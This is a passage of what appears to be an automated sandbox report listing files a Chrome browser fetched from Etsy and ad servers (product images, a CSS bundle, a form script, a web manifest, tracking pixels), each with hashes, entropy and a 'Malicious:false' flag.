                                                                                                                                                                              SHA-512:9380AC8F2DC3B387B4E182371DC8827C79412239F15FF121D3422D54C491ED5716A73B46897E67B4313B271AE8C73B3B6A790A21C6EFFAA8DC64403076BAD919
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd......,.,.."........................................Q.........................!..1"AQ..2aq....#B..3Rrs....$4CSc....b.....5V...6Ddt................................9.......................!13AQr....2RSaq..."...Bb...C#...............?..1G.V(b.N.....(.<P...t`Q.....P.....Q...V(.....(&../....iZia4..,+
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):160860
                                                                                                                                                                              Entropy (8bit):5.045424132045021
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:6BA6A64250442BA22019F7F10772A83F
                                                                                                                                                                              SHA1:EE5B1FAC93193CBCA5B54B6722F25B1C79B2457D
                                                                                                                                                                              SHA-256:A32463E3906CC79764263AB9719B92662491EFAAA3253C92AD80F51792D436D0
                                                                                                                                                                              SHA-512:8E01AC6804DCB02DAFEE9FC8EA18DEFF2DD8B9B3899E37001847661B028A30268D99DA6D478A005720AE64A83EBFF13FEE40A06975B43316FDF7556175471C58
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:"https://www.etsy.com/dac/search2_neu/desktop.00d19f16e05ad5,web-toolkit-v2/modules/action_groups/action_groups.74cb1c37c4995e,__modules__Registry__src__/Common/RegistryIngressBanner/View.74cb1c37c4995e,search2_neu/modules/search_ingress.74cb1c37c4995e,search2_neu/modules/anchor_listing_stars.74cb1c37c4995e,common/stars-colors.74cb1c37c4995e,search2_neu/modules/narrow_by_theme.74cb1c37c4995e,search2_neu/modules/narrow_by_style.74cb1c37c4995e,web-toolkit-v2/modules/panels/panels.74cb1c37c4995e,search2_neu/modules/mobile/edd-top-filter.9fd5f240174fed,__modules__GiftReceipt__src__/EDDNudge/Styles.bd4d550133618a,/neu/common/refine-by-listing-header.74cb1c37c4995e,market/search_results.74cb1c37c4995e,search2_neu/modules/collage_listing_card.74cb1c37c4995e,web-toolkit-v2/modules/toasts/toasts.74cb1c37c4995e,search2_neu/modules/common/add_to_cart_flyout.ff92627a19c80e,listing-page/image-carousel/touch-image-carousel.74cb1c37c4995e,neu/modules/favorite_button_defaults.74cb1c37c4995e,common/listing_card_text_badge.b1c6bd381ce780,common/stars-sprite.b1c6bd381ce780,search2_neu/skeletons.74cb1c37c4995e,recommendations/card_group.74cb1c37c4995e,neu/common/responsive_listing_grid.74cb1c37c4995e,web-toolkit-v2/modules/forms/checkboxes.0bdecd6a071386,web-toolkit-v2/modules/forms/form_groups.74cb1c37c4995e,web-toolkit-v2/modules/forms/radios.0bdecd6a071386,search2_neu/filter/filter-toolkit-v2.74cb1c37c4995e,search2_neu/filter/desktop-overlay.74cb1c37c4995e.css?variant=sasquatch"
                                                                                                                                                                              Preview:.icon-spaced{text-indent:2px;padding:1px 3px}.max-width-full{max-width:100%}.max-width-90{max-width:90%}.pr-xs-0-5{padding-right:3px}.p-xs-1-5{padding:9px}.pb-xs-1-5{padding-bottom:9px}.pr-xs-1-5{padding-right:9px}.pt-xs-1-5{padding-top:9px}.mt-xs-3-5{margin-top:21px}.child-mr-xs-1>*{margin-right:5px}.child-mb-xs-1>*{margin-bottom:5px}.h1-display{line-height:1.15}.ui-toolkit .btn-small.more-like-this{margin-top:3px;padding-right:8px}.sentence-case:first-letter{text-transform:capitalize}#content .v2-listing-card .search-text-decoration-underlined{text-decoration-line:underline!important}.smart-banner .tab,.smart-banner.tab{float:none}.smart-banner .smart-banner-btn[disabled]{opacity:.4}.body-max-width-980 .smart-banner.tab{margin-left:0}.card-group{padding:0}.card-group .card-img-wrap{background-color:#f5f5f1;font-size:0}.card-group .card-img-wrap img{display:inline-block}.card-group .card-img-wrap.results-1 img{width:100%}.card-group .card-img-wrap.results-2 img{width:50%}.card-group .
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x600, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):115103
                                                                                                                                                                              Entropy (8bit):7.974433195410461
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:6EECE9DC9AB072E77ABFD8967178D3DD
                                                                                                                                                                              SHA1:4C5156999CAD61DC4DCC4B985DCF94AEAB0056AE
                                                                                                                                                                              SHA-256:5650E2A5FB393741A448BB715455997595A7A2868DF5EEEA1C3FBF2F98BB4F40
                                                                                                                                                                              SHA-512:BC12B0082B3ED3E0468FF80D4631906D0D23EFA51061D2E134D19CF0E9AEA82ED596AE22BADCE57592C2995D62B25FBF5F2B277638368B183FAF11927F45E848
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd......X.X..".........................................G.........................!1.AQ."aq..2...#BR...b..3...$r..C4S.%....Ds..................................:......................!..1.AQ."aq...2.BR...#...3b$r..Ss.............?.R.L.<...Y`..B.qg,6.G.....9.1..}rE4.....'s..7.2n..I.D31...Q.;j#....H..]
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):47124
                                                                                                                                                                              Entropy (8bit):7.9909849136954625
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:49ADC1B9054EF369F69497E054928CF9
                                                                                                                                                                              SHA1:EA1D0F5576FEF4967A8BAE70DEEF1BD78DE0E46E
                                                                                                                                                                              SHA-256:2A0D8BAD2871BC81D8CD4EF8B9D6800E91E9113B59E12734A101BFF1FBE5017C
                                                                                                                                                                              SHA-512:CC86877E3BD6F23D8CC20210E836DFE8070D17F4EDE9270A76B696BF2744610EFC447A58AAFE7541571FC81609F3D8F1824A135B2B51972426B8301F47014906
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/6763085/r/il/eae398/1690049883/il_600x600.1690049883_7n0t.jpg
                                                                                                                                                                              Preview:RIFF....WEBPVP8X.... ...W..W..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..VP8 .......*X.X.>I .E".!!&..P..M.P.....#.......vi......{......_....~.m.g.........B...#.......?...=.~..............?.._.......g>.._.5.[./......?...h...C.{...?.?......_..............{.C.3............................P.7....`.........<.=..../...-.c......&......Q..s...9./......^>.....2............A.nc@...a9....s\.F.S..q....v..x....C,....)...ca...:1u..-.E+.0..D.'vd.7. ~0;.X.!.+.21'.0...//....3...u"..o.......e..~L..Z..
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 50x50, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):1346
                                                                                                                                                                              Entropy (8bit):7.844658249314594
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:3F983BA95C7EC12EE5572C4595AC0A3F
                                                                                                                                                                              SHA1:15AC8E3C7221A9E8151702E15254BE409FEA309F
                                                                                                                                                                              SHA-256:AB82F9A68B10B3F712300AF4E0F463AA88966600348144C2926B87A748144B98
                                                                                                                                                                              SHA-512:350F102223FF3980AB439A6C00DAD5F42EB4178ACB59080B0F9318F6B075DA6EBB22EBC756481722E6C2511EA2BEE1CFFD3407000CB298631F0592A4011BDF30
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/iusa/5a3a98/95369803/iusa_50x50.95369803_8cse.jpg?version=0
                                                                                                                                                                              Preview:RIFF:...WEBPVP8 .........*2.2.>U .D#..~;$...[.0......lv_...V.......z...+...o....m...?.W........Vw.....~..@.%....O..A.."..<z.{}o.C?..H..>l[..c..j.\..3..oB`../.5+%\..b .'T..F.+..XF.y...F'..N.G..0A...F.}e..u......]&...v.m..\....c..B...IP..'.......5.z.:@..C./.......%..6j.g.V.f$..'.8.C}_<.......1.A....OM..8o..(..'.V1..._.w.IQI....|'.9eO%1Q..&bO#.d....../.~.d.E..d.yU.....S....iR ...w..+.>.fG...G...^.V..,f.g'.J..S4.$.<..[.........i...._...?..._.3.4..w'.....[..?...!<..;..L'.ic9..(PHp.."u1._-M.G.....q.3.|.!D..f..w@Gp..D...8ts..._("h.Q..&.3L=.Q.ais.@...[.h.N.^..?9Vw.\...b.........:oW..E.M..nT..c........T.4........_P{.....+...6.68..jC.z............l.......c..~.M...j......\...x.I..W..'x'...g_.BE.|..E.fH.M...W.P.;.U=....-Z..v#.?...x.[4....-.}G...y...H.......O.M......H.".4fY..u+....e.\.O.b.bz..:XQc..C#.\N....f.0.b@f..<0..c..O..w.....l......{.I'...lV\R......>>mzK.x.\+...6y..Vd=..&....N.....b@...gYe.*.. q...=/..V@bXXPk......0.f..SIO<k..
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):84097
                                                                                                                                                                              Entropy (8bit):7.997637626109016
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:0CF3D0F714DECBA679399F6EEB3200F0
                                                                                                                                                                              SHA1:C65D9AD39442D0E9027F27CA59A96E3AD36B0ED1
                                                                                                                                                                              SHA-256:AEC15BBF2647F1B9971478E7EAF24446E10F3E62A35E4032F447AD0FDE725EB6
                                                                                                                                                                              SHA-512:0BD6C66C38C0BB888985FFFCED579F08DB2B7502020980BFC1DD4BEC0D5DFDFD63264A102395DBEAF796687622E4CA6DF882C2AE906211E46460CA00D49F5EA4
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/22326516/r/il/5ee477/6089871449/il_600x600.6089871449_pdce.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@..................Gs...#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......X...X....pixi............ipma.................G{mdat.....&ey_.....2.......q@.=... ...o.-.o%...x.?.4.i..u.......<i..e+.l...&.....r.C.._....Z....7..gY.Do..t.|.z.\c....l.}DW\dX./'.}..y..5qg93-..I.}G..:...Y.^...r..{.........`..P...{.?@q6..._.[.....'.e..].....~7.6..._......o.....`d.....<u/ZW......g...6...<4.p.Q.....P.'...b.vb...N..}..M..].'.j.8....bg.[.k....._W.c.]K.0.....$.I.J...N..}..t.....t9g=.R..F....;......2.......=s.dd....../.....b~f..6]}.......~q.u........"....K...c.U..%m...G..ec.&...SLw..^T...c.Q.N..$%...".#....EY9Wx~.k0.M.j.".%.i@L..d.=vA.-.*.e.....pJ..0(..?.U<p.ASj...G......=C./.L...!...e*..P..._.=p..F..1.}/...^z.. ./.....y.Sv..^.).4..6l..*...DJ.4W)..g[R...i+..i!....$I6...f........?..Jo.(...7.t.`..].E..K..._.&c.W....t..\...U...
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (324)
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):142500
                                                                                                                                                                              Entropy (8bit):4.402838088274111
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:9B53A535F8AB79CF0B3039E2787B74DC
                                                                                                                                                                              SHA1:85C77A28DDDA8C9787DF5338A4DF7A1195D124C6
                                                                                                                                                                              SHA-256:1C410D95B18606B78E79745867C1C88F33E16CA1B4293CB5A3CCE4DB1D0626D7
                                                                                                                                                                              SHA-512:8458A3E46C5ACD67CFAE46B15BADFE4801E9981711FE7926AF890CC60BDDA3CFC1B10876B6F21DA58C493129E79BD7276908CE2C0F171D79E01E3144D6154F5C
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://submit.jotform.com/js/protoplus-ui.js
                                                                                                                                                                              Preview:/**. * UI Elements. * document.createNewWindow => Creates a new floating window. * Element.editable => Make the element instant editable. * Element.tooltip => show a floating tooltip when mouse overed. * Element.setDraggable => Make the element draggable. * Element.makeSearchBox => convert normal input to a apple search box. * Element.slider => Custom input slider. * Element.spinner => Custom input spinner. * Element.textshadow => Mimics CSS textshadow. * Element.rating => Prints rating stars. * Element.colorPicker => Prints a colorPicker tool. * Element.miniLabel => Places a mini label at the bottom or top of the input fields. * Element.hint => Places hint texts into text boxs. */..if(window.Protoplus === undefined){. throw("Error: ProtoPlus is required by ProtoPlus-UI.js");.}.Object.extend(document, {. getViewPortDimensions: function (){. // the more standards compliant browsers (mozilla/netscape/opera/IE7) use window.innerWidth and window.innerHeight. var height;
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 680x540, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):83315
                                                                                                                                                                              Entropy (8bit):7.964939535066653
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:246983F67D435B0EFB3A8EBBA9567085
                                                                                                                                                                              SHA1:33C38087D4817D8348268FCAA1BCF86B7E22CAEC
                                                                                                                                                                              SHA-256:D292FC7B3428D385AFCB46C1F84EA1B313029C28CA6130822E9CC4AE93440F6C
                                                                                                                                                                              SHA-512:3931F4C3E7FB66A91BE84C9A7A01BF2B9CA1E80593410AA81C1DB8A839BF4F7C8EBEC0C4253CACB79A27BCAF84EACD1DB18B92E9B454D9F1F4483C121D3FDA99
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd...........".........................................D.........................!1A.."Qa2q.B...#...R..3br..$...4C.Sc..DT.................................5........................!1A.."Qaq2....#BR...3b.4C.r............?..#.L..E.=..S...Bq...?.ca.?jb...*T...e.L.?P..-.`2.}.>!.......DO.&......9.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):7931
                                                                                                                                                                              Entropy (8bit):7.945086100283011
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:1030FB4E1951BB89F0F8631CF0315F8B
                                                                                                                                                                              SHA1:E8DCF42666D1FA11299E0760F2309F0CC53952E8
                                                                                                                                                                              SHA-256:F61956AD5B5424AC03CAF964E110547E159798EAB83C59B94EBACC2C1571A6B4
                                                                                                                                                                              SHA-512:3A7A74E64595618BFAFB2329B1DD3D97B44513B59A83ACEF1EED6F029DB5B7AB9FABC876A93D722AAFC444D8BCA3DF228D45D38C899960B83BCCDED20D082EAC
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/ij/1a63f6/5641692451/ij_300x300.5641692451_rjmmpzi0.jpg?version=0
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@.......................#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......,...,....pixi............ipma...................mdat....."%r....4 2.;. ...A@.Kn0.z..r..$. f..s.}.x(3....q. .........n.3:Q...l...P.....e.......O......[I...}q._@..T...fae(z.}*..4.<.j}G`.......$..A....Ri.._..0.O-}...n9Zj,k.fp;.....xa..W]..|...o...q3.4..T..y..C.%.._.z_......kS....O.[`K.._.R...$_.=<S..0..V.cV....U].Q...4.G..0.y>......!..$...D...&.^....#|..6.r...%Q).l......$s..^...y..#.......u..m3"..n....S.\1..{p.q..1W..'....J.}..}3....[.%J.6y..y...bk.....4i........F.h:X......p....sT}..*..K./..7.....QuO3.Y...'.&*ix........<.E...y..p...j...dz'l.v.F."... .k.rN4e..$..~.P.D.):.h..6wq6. .l"..c.h...9........D..^m'.gwt{z.r....Y.....&K...:u>=|....\.-....'2...8Z........W.T...a...s.....5 E.s.w..@"x.........y.;@..T.&.`.....h..jan..s..6y](...e.J.r...
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):492
                                                                                                                                                                              Entropy (8bit):4.287429819926425
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:C211B87CA155CF0B9EDF9299FC3A6841
                                                                                                                                                                              SHA1:6B3F78DA95D7CEF287EAC895BA84B41AF5E6CBFB
                                                                                                                                                                              SHA-256:7AA5C0E017FF5CC02CEEA5360E907305C94175E5D0DB193077103F241E274C53
                                                                                                                                                                              SHA-512:6516E26633512DA38E9B41F83F8BF7E67EA0B6DDBF479889ED32B58983226AF603D5C1283D3381B33FDA21A902AD2CA37BAD6A4FEFBC22644303A92815317D02
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://www.etsy.com/site.webmanifest
                                                                                                                                                                              Preview:{. "name": "Etsy",. "short_name": "Etsy",. "icons": [. {. "src": "/images/android-chrome-192x192.png",. "sizes": "192x192",. "type": "image/png". },. {. "src": "/images/android-chrome-512x512.png",. "sizes": "512x512",. "type": "image/png". }. ],. "theme_color": "#ffffff",. "background_color": "#ffffff",. "start_url": "/?utm_source=installed_pwa",. "display": "browser".}.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 50x50, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1702
                                                                                                                                                                              Entropy (8bit):6.7269340528310595
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:BF2A1CB385D341E15AED7D0755A854F0
                                                                                                                                                                              SHA1:1FF278CC4BD83185E9C74E75A3CAAC1D1699EA9C
                                                                                                                                                                              SHA-256:5642E62CFB518C2A370BF1EE1813AB70409D8717B48AB23BB4B89C96F23748DC
                                                                                                                                                                              SHA-512:F375171B26C454098388655C75B9A006BF88A6308B853DF7A9B6A43753E6D131B736282333EFA1831AF5B2FBB62DCA3DBF7BE2C1218E9CD558A5C0416B38F9E9
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd......2.2.."..................................................................!...1A..QBa.."2..3R...............................,.......................!..1A."aq.3QR.4B...............?.m.\y.].7I.::.e#!..A....w.P.8..:..q..$a..w..|...f..-h...d.j...vf.M...=.....O3..s...rO......>j.Y.9.;n5.J{..k
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):16261
                                                                                                                                                                              Entropy (8bit):7.9812249074581425
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:B66AC9DEB73EAD90B0B520FB3FF591D7
                                                                                                                                                                              SHA1:4240C500B4FE6CF48F1CCBB8535E82D537368E68
                                                                                                                                                                              SHA-256:FF5D4C0601EF4CB22AEBF7770F28DD8B975D5000AB3F14AAF264A8AE534C841A
                                                                                                                                                                              SHA-512:1C0A44A205073F4EA29EFD5F0A6B308B5073C631BB3F67D0CD273DCFF3D0518EEE9D74FD29C2DD8613E62D92B21B7010862EB1678EA240792FA1D4EC59A475F2
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/21536520/c/1951/1951/216/733/il/e6844e/3655473308/il_300x300.3655473308_tto5.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@..................>w...#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......,...,....pixi............ipma.................>.mdat....."%r....4 2.|.P........V..........on....j.F4..8=m...z..../......N ..P.H....B..d....1.^.P%.;./x....:.S..E...Q.5....(.|.+.Q...Z?.........|[+...Q..$}..c?bC...........Y=...,.+.(..k...s.8.6.V4.'..I6.f..<mGL...pr.....O.O..fW.....F.+.-o..i..[...5..U\yX.$.s=....S....$.dn..?.%.c..=..%K.h.o...4...c..TO.....MmT...sh1g].~P...r.n.*^..pT....y....m........0.d..........'.&.EED.K.......hE...Wy@.<.=.........7.[M.....j.09U.&.D....=!3..+.wY..`.m0...SA1.;x.....K.YB"......$R..&td,..Q..s...F?.d.B.. ..H.Q.':}...B.9.0..K.r...,...2...3.X..o.H..4..|..t.S..}B.3M)o.......O.V..a.n...x.."..fmk*.DX.....f....?....=.z_.R..=..J..xjz...Awk...:..j.'..4L.......+<....i.4...d.....o.p.y.Z(UM.\...QV=P......D.f...CK....B.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):70
                                                                                                                                                                              Entropy (8bit):3.577769619550495
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:58A7930CD4577FC33C35828C271EAB8F
                                                                                                                                                                              SHA1:406E57F86DC101E10F3A57BE1E2F7B93C4580474
                                                                                                                                                                              SHA-256:8D70B3E6BADB6973663B398D297BB32EAEDD08826A1AF98D0A1CFCE5324FFCE0
                                                                                                                                                                              SHA-512:F7A5F748F4C0D3096A3CA972886FE9A9DFF5DCE7792779EC6FFC42FA880B3815E2E4C3BDEA452352F3844B81864C9BFB7861F66AC961CFA66CB9CB4FEBE568E8
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://match.adsrvr.org/track/cmf/generic?ttd_pid=pubmatic
                                                                                                                                                                              Preview:GIF89a...................!..NETSCAPE2.0.....!.......,................;
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):6635
                                                                                                                                                                              Entropy (8bit):7.93716176209637
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:D280D5B931B89E2304838AF99D0E0DBB
                                                                                                                                                                              SHA1:8F1349FDB105EF73DC72F471FB6F2D4D7B8B14E9
                                                                                                                                                                              SHA-256:C7DBE447AF27418F1057EC3A93D5AF44F6EB5AABF9FA6AC4A40D84F838E2B74E
                                                                                                                                                                              SHA-512:4E971C5E51D6A6C18C192516DC68009415A2DD51BF95CF271DE2C6BD80C8F1D7DED809C7C30A180F4D830FD714E9D22CC53B42D139D6CD500352A9F6E47DD887
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/13612430/r/il/4078bc/4290711727/il_600x600.4290711727_5gzf.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@.......................#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......X...X....pixi............ipma...................mdat.....&ey_.....2.1D@.0..P..S....Q.5\M..... n.....s\...{.B..r..........K.QVI?!v2...=.vw..H]=...?].y..&..kV&...<...e..().JI.....:.....H9.....3K|*U..Dz...[.;.0..I....M+..:..v...J.*..8.h.R.@.....w...g~Ru.3.V......(_.&....d..3..U....6..4{.X.....u.......[..,[z8....~...MGuh;5....boh.......V[.{.@.OW`.2..O...x.eE.P.=.{.Cui.c.6.oA.2A(5._E.w..".]....W.n....xS6>...g|..0b.(.MGF.}H..3..|N.N.<...6....@....U..B..:9N.~6.7.w..[.}z.oo. .:.CF.I..........9.R..j..K....._v.}{.-.X..O...B}H...&.....r...X#.,..,...\...]..7..jf...H....y`..j.d....Pn.jo....~...X.`....K...R*q|/...d.M.6.....Ce.h.Y.KE.-.&..n.M-...^...i...(.\3.?.\..?v......i...u..<Zc.~X.l/.bE(...N.v.d].,...`..JQX.f..`.(.._..8g.`.i.Hy9....p.n'.../J.~&...
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (530)
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):1157
                                                                                                                                                                              Entropy (8bit):5.518436701890961
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:C921952B3BD246D0454F653DB0F11104
                                                                                                                                                                              SHA1:FF165E8DC678E03C2B82E4175544A7899449FA18
                                                                                                                                                                              SHA-256:D7DD4608D20BA8508605E519A2599719CE8A7F2B3C0A3BB016B08BEBA854ACEF
                                                                                                                                                                              SHA-512:7F365EFF2FB503FDC3A15F8E941705EEB405CE6130A35D25D06DFEE0F0EBF60084D1D9FE4CE0339FED01B7F8C8CF55FEF1ADADBB4A0652D25924C65BC9EC4DC1
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://8666735.fls.doubleclick.net/activityi;dc_pre=CKewkJ-dn4kDFevvEQgdb0ctaQ;src=8666735;type=count0;cat=etsy_000;ord=1;num=3212989082534;npa=0;auiddc=2084024919.1729505276;ps=1;pcor=1578851005;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe4ah0v9189895925z86935543za201zb6935543;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=101686685;epver=2;~oref=https%3A%2F%2Fwww.etsy.com%2F?
